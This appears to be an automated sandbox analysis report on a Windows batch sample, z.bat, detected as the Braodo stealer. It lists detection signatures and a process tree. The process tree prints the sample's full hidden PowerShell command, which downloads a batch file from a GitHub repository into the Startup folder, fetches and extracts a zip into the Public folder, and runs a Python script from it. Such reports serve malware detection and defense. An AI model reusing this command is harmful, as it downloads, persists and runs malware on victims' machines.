Windows
Analysis Report
z.bat
Overview
General Information
Detection: Abobus Obfuscator, Braodo

| Score | Range | Whitelisted | Confidence |
|---|---|---|---|
| 100 | 0 - 100 | false | 100% |
Signatures
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected Abobus Obfuscator
Yara detected Braodo
Yara detected Powershell download and execute
AI detected suspicious sample
Drops script or batch files to the startup folder
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: PowerShell DownloadFile
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious Program Location with Network Connections
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected non-DNS traffic on DNS port
Dropped file seen in connection with other malware
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious PowerShell Download - PoshModule
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- cmd.exe (PID: 7260 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\z.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 7268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - powershell.exe (PID: 7312 cmdline: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/roukistl/ud/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowSafety.bat');[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/roukistl/dcm2/raw/main/Document.zip', 'C:\Users\Public\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\Users\Public\Document\python C:\Users\Public\Document\Lib\sim.py; del C:/Users/Public/Document.zip" MD5: 04029E121A0CFA5991749937DD22A1D9)
  - conhost.exe (PID: 7320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - python.exe (PID: 4100 cmdline: "C:\Users\Public\Document\python.exe" C:\Users\Public\Document\Lib\sim.py MD5: A7F3026E4CF239F0A24A021751D17AE2)
  - cmd.exe (PID: 1792 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - cmd.exe (PID: 7272 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- cmd.exe (PID: 7696 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowSafety.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 7704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - chcp.com (PID: 7748 cmdline: chcp.com 437 MD5: 33395C4732A49065EA72590B14B64F32)
  - findstr.exe (PID: 7764 cmdline: findstr /L /I set "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowSafety.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
  - findstr.exe (PID: 7780 cmdline: findstr /L /I goto "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowSafety.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
  - findstr.exe (PID: 7796 cmdline: findstr /L /I echo "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowSafety.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
  - findstr.exe (PID: 7812 cmdline: findstr /L /I pause "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowSafety.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
  - find.exe (PID: 7828 cmdline: find MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
  - cmd.exe (PID: 7844 cmdline: C:\Windows\system32\cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - find.exe (PID: 7860 cmdline: find MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
  - cmd.exe (PID: 7880 cmdline: C:\Windows\system32\cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - powershell.exe (PID: 7900 cmdline: powershell.exe -WindowStyle Hidden -Command "C:\Users\Public\Document\python C:\Users\Public\Document\Lib\sim.py" MD5: 04029E121A0CFA5991749937DD22A1D9)
  - conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_Braodo_1 | Yara detected Braodo | Joe Security | |
| | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_AbobusObfuscator | Yara detected Abobus Obfuscator | Joe Security | |
| System Summary | |
|---|---|
| Source: | Author: Florian Roth (Nextron Systems), Tim Shelton |
| Source: | Author: Florian Roth (Nextron Systems) |
| Source: | Author: Florian Roth (Nextron Systems) |